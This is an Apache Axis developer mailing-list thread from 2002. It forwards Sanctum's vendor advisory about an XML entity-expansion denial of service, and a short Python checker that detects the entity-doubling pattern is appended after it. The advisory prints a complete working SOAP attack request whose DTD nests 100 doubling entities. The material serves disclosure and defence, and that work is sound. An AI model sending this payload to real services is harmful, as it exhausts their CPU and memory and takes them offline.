I think tom fixed it (http://marc.theaimsgroup.com/?l=axis-dev&m=103773176108393&w=2)
Thanks,
dims

--- Ted Leung <[EMAIL PROTECTED]> wrote:
> This security alert came through today.
>
> Ted
> ----- Original Message -----
> From: "Ian Holsman" <[EMAIL PROTECTED]>
> To: <[EMAIL PROTECTED]>
> Cc: "Ory Segal" <[EMAIL PROTECTED]>
> Sent: Tuesday, November 26, 2002 8:02 AM
> Subject: Security Alert - Apache/Axis
>
>
> > Dear [EMAIL PROTECTED],
> >
> > During a recent security audit at one of our customers, Sanctum found a
> > security vulnerability in your product Apache/Axis.
> > The details of this vulnerability are described in the attached text file.
> >
> > We intend to issue a public advisory on BugTraq, SecuriTeam and other site
> > forums about this vulnerability the last week of November. Please note, the
> > advisory will not contain specifics that might enable someone to exploit the
> > vulnerability.
> >
> > We would appreciate it if you could issue a patch in that timeline (i.e.
> > around November 25th), so it can be linked to our advisory.
> >
> > Please feel free to contact me for more information/help.
> >
> > Thanks,
> > -Amit
> >
> > <<XML_DTD_Axis.txt>>
> >
>
> --------------------------------------------------------------------------------
>
> ///////////////////////////////////////////////////////////////////////
> ========================>> Security Advisory <<========================
> ///////////////////////////////////////////////////////////////////////
>
>
> => Author: Amit Klein - Sanctum inc. http://www.sanctuminc.com/
>
> => Release date: 14/Nov/2002
>
> => Vendor: Apache Group
>
> The following product was found to be vulnerable:
>
> - Apache Axis SOAP server (checked with Xerces-J and Tomcat)
>
> The versions affected are the latest ones (as of October 2002).
>
> => Severity: High
>
> => CVE candidate: Not assigned yet.
>
> => Summary: Using the DTD part of the XML document, it is possible to cause the
> XML parser to consume 100% CPU and/or a lot of memory, therefore resulting in
> a denial of service condition.
>
> => Description: The DTD part of the XML document enables the document to define
> named entities (other than the predefined &lt;, &gt;, etc.). The entities can be
> defined using other entities (recursion is prohibited in XML 1.0).
> Entities are expanded when they are referenced, inside the XML document.
> The attack is comprised of defining and referencing an entity which is defined
> using two instances of another entity, which is (in turn) defined as two instances
> of yet another entity, and so on. This definition process can be repeated as long
> as "necessary" - we found that nesting level of 100 is usually sufficient.
> The 100th entity should be defined simply as a string. This has the effect of having
> the first entity contain, in theory, 2^99 (two to the power of ninety nine)
> concatenated values of the 100th entity.
> Here's an example (the DTD is to be placed after the XML declaration, and before the
> root element of the XML document):
>
> <!DOCTYPE root [
> <!ENTITY x100 "foobar">
> <!ENTITY x99 "&x100;&x100;">
> <!ENTITY x98 "&x99;&x99;">
> <!ENTITY x97 "&x98;&x98;">
> ...
> <!ENTITY x3 "&x4;&x4;">
> <!ENTITY x2 "&x3;&x3;">
> <!ENTITY x1 "&x2;&x2;">
> ]>
>
> Referring to the first entity inside a document that would otherwise be accepted by
> the application (using the syntax &x1;), results in a DoS condition, due to the
> excessive CPU load and/or memory load required by the XML parser to expand this entity.
>
> => Solution: Not available yet.
>
> => Workaround: Not available yet.
>
> => Example:
>
> Ory Segal from Sanctum devised a SOAP request that manages to mount this attack requiring
> only a path to an existing web service to be known to the attacker.
>
> The request is:
>
> POST path_to_web_service HTTP/1.0
> Host: ...
> Content-Type: text/xml
> SOAPAction: ""
> Content-Length: 3224
>
> <?xml version="1.0" ?>
> <!DOCTYPE foobar [
> <!ENTITY x0 "hello">
> <!ENTITY x1 "&x0;&x0;">
> <!ENTITY x2 "&x1;&x1;">
> <!ENTITY x3 "&x2;&x2;">
> <!ENTITY x4 "&x3;&x3;">
> <!ENTITY x5 "&x4;&x4;">
> <!ENTITY x6 "&x5;&x5;">
> <!ENTITY x7 "&x6;&x6;">
> <!ENTITY x8 "&x7;&x7;">
> <!ENTITY x9 "&x8;&x8;">
> <!ENTITY x10 "&x9;&x9;">
> <!ENTITY x11 "&x10;&x10;">
> <!ENTITY x12 "&x11;&x11;">
> <!ENTITY x13 "&x12;&x12;">
> <!ENTITY x14 "&x13;&x13;">
> <!ENTITY x15 "&x14;&x14;">
> <!ENTITY x16 "&x15;&x15;">
> <!ENTITY x17 "&x16;&x16;">
> <!ENTITY x18 "&x17;&x17;">
> <!ENTITY x19 "&x18;&x18;">
> <!ENTITY x20 "&x19;&x19;">
> <!ENTITY x21 "&x20;&x20;">
> <!ENTITY x22 "&x21;&x21;">
> <!ENTITY x23 "&x22;&x22;">
> <!ENTITY x24 "&x23;&x23;">
> <!ENTITY x25 "&x24;&x24;">
> <!ENTITY x26 "&x25;&x25;">
> <!ENTITY x27 "&x26;&x26;">
> <!ENTITY x28 "&x27;&x27;">
> <!ENTITY x29 "&x28;&x28;">
> <!ENTITY x30 "&x29;&x29;">
> <!ENTITY x31 "&x30;&x30;">
> <!ENTITY x32 "&x31;&x31;">
> <!ENTITY x33 "&x32;&x32;">
> <!ENTITY x34 "&x33;&x33;">
> <!ENTITY x35 "&x34;&x34;">
> <!ENTITY x36 "&x35;&x35;">
> <!ENTITY x37 "&x36;&x36;">
> <!ENTITY x38 "&x37;&x37;">
> <!ENTITY x39 "&x38;&x38;">
> <!ENTITY x40 "&x39;&x39;">
> <!ENTITY x41 "&x40;&x40;">
> <!ENTITY x42 "&x41;&x41;">
> <!ENTITY x43 "&x42;&x42;">
> <!ENTITY x44 "&x43;&x43;">
> <!ENTITY x45 "&x44;&x44;">
> <!ENTITY x46 "&x45;&x45;">
> <!ENTITY x47 "&x46;&x46;">
> <!ENTITY x48 "&x47;&x47;">
> <!ENTITY x49 "&x48;&x48;">
> <!ENTITY x50 "&x49;&x49;">
> <!ENTITY x51 "&x50;&x50;">
> <!ENTITY x52 "&x51;&x51;">
> <!ENTITY x53 "&x52;&x52;">
> <!ENTITY x54 "&x53;&x53;">
> <!ENTITY x55 "&x54;&x54;">
> <!ENTITY x56 "&x55;&x55;">
> <!ENTITY x57 "&x56;&x56;">
> <!ENTITY x58 "&x57;&x57;">
> <!ENTITY x59 "&x58;&x58;">
> <!ENTITY x60 "&x59;&x59;">
> <!ENTITY x61 "&x60;&x60;">
> <!ENTITY x62 "&x61;&x61;">
> <!ENTITY x63 "&x62;&x62;">
> <!ENTITY x64 "&x63;&x63;">
> <!ENTITY x65 "&x64;&x64;">
> <!ENTITY x66 "&x65;&x65;">
> <!ENTITY x67 "&x66;&x66;">
> <!ENTITY x68 "&x67;&x67;">
> <!ENTITY x69 "&x68;&x68;">
> <!ENTITY x70 "&x69;&x69;">
> <!ENTITY x71 "&x70;&x70;">
> <!ENTITY x72 "&x71;&x71;">
> <!ENTITY x73 "&x72;&x72;">
> <!ENTITY x74 "&x73;&x73;">
> <!ENTITY x75 "&x74;&x74;">
> <!ENTITY x76 "&x75;&x75;">
> <!ENTITY x77 "&x76;&x76;">
> <!ENTITY x78 "&x77;&x77;">
> <!ENTITY x79 "&x78;&x78;">
> <!ENTITY x80 "&x79;&x79;">
> <!ENTITY x81 "&x80;&x80;">
> <!ENTITY x82 "&x81;&x81;">
> <!ENTITY x83 "&x82;&x82;">
> <!ENTITY x84 "&x83;&x83;">
> <!ENTITY x85 "&x84;&x84;">
> <!ENTITY x86 "&x85;&x85;">
> <!ENTITY x87 "&x86;&x86;">
> <!ENTITY x88 "&x87;&x87;">
> <!ENTITY x89 "&x88;&x88;">
> <!ENTITY x90 "&x89;&x89;">
> <!ENTITY x91 "&x90;&x90;">
> <!ENTITY x92 "&x91;&x91;">
> <!ENTITY x93 "&x92;&x92;">
> <!ENTITY x94 "&x93;&x93;">
> <!ENTITY x95 "&x94;&x94;">
> <!ENTITY x96 "&x95;&x95;">
> <!ENTITY x97 "&x96;&x96;">
> <!ENTITY x98 "&x97;&x97;">
> <!ENTITY x99 "&x98;&x98;">
> <!ENTITY x100 "&x99;&x99;">
> ]>
> <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
> xmlns:xsi="http://www.w3.org/1999/XMLSchema-instance"
> xmlns:xsd="http://www.w3.org/1999/XMLSchema">
> <SOAP-ENV:Body>
> <ns1:aaa xmlns:ns1="urn:aaa" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
> <foobar xsi:type="xsd:string">&x100;</foobar>
> </ns1:aaa>
> </SOAP-ENV:Body>
> </SOAP-ENV:Envelope>
>

=====
Davanum Srinivas - http://xml.apache.org/~dims/
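A pre-parse check for the entity-doubling pattern the advisory describes, added here as an example (it is not code from this thread or from Axis): it computes each entity's expanded length arithmetically, so nothing is ever expanded, and by default rejects any DOCTYPE because SOAP 1.1 forbids a DTD in messages. The function names, the character budget and the depth cap are assumptions.

```python
import re

# Internal general entities only: <!ENTITY name "value">. Parameter and
# external (SYSTEM/PUBLIC) entities do not match and are treated as undeclared.
ENTITY_DECL = re.compile(r'''<!ENTITY\s+([^\s%]+)\s+(?:"([^"]*)"|'([^']*)')\s*>''')
ENTITY_REF = re.compile(r"&([^;&#\s]+);")
PREDEFINED = {"lt", "gt", "amp", "quot", "apos"}
MAX_DEPTH = 200  # assumed nesting cap, keeps the recursion bounded

# Constructed sample: four levels of the doubling pattern from the advisory.
SAMPLE = """<?xml version="1.0"?>
<!DOCTYPE foobar [
<!ENTITY x0 "hello">
<!ENTITY x1 "&x0;&x0;">
<!ENTITY x2 "&x1;&x1;">
<!ENTITY x3 "&x2;&x2;">
]>
<foobar>&x3;</foobar>"""

def declared_entities(xml_text):
    entities = {}
    for name, dq, sq in ENTITY_DECL.findall(xml_text):
        entities.setdefault(name, dq or sq)  # first declaration wins in XML
    return entities

def expanded_length(name, entities, memo=None, stack=()):
    """Length of &name; once fully expanded, computed arithmetically."""
    memo = {} if memo is None else memo
    if name in PREDEFINED:
        return 1
    if name in memo:
        return memo[name]
    if name not in entities or name in stack or len(stack) >= MAX_DEPTH:
        raise ValueError("undeclared, recursive or too deeply nested entity: " + name)
    text = entities[name]
    total = len(ENTITY_REF.sub("", text))  # literal characters
    for ref in ENTITY_REF.findall(text):   # each reference costs its own expansion
        total += expanded_length(ref, entities, memo, stack + (name,))
    memo[name] = total
    return total

def check_request(xml_text, budget=1_000_000, allow_dtd=False):
    """Return (accepted, reason) before the body is handed to the XML parser."""
    if "<!DOCTYPE" in xml_text and not allow_dtd:
        return False, "DOCTYPE not allowed"  # SOAP 1.1 forbids a DTD in messages
    entities, memo = declared_entities(xml_text), {}
    try:  # references inside the DTD are counted too, which only over-estimates
        total = sum(expanded_length(r, entities, memo) for r in ENTITY_REF.findall(xml_text))
    except ValueError as exc:
        return False, str(exc)
    if total > budget:
        return False, "expansion of %d characters exceeds budget" % total
    return True, "ok"
```

Because every entity's length is memoised, the cost is linear in the size of the DTD even when the expanded text would be astronomically large.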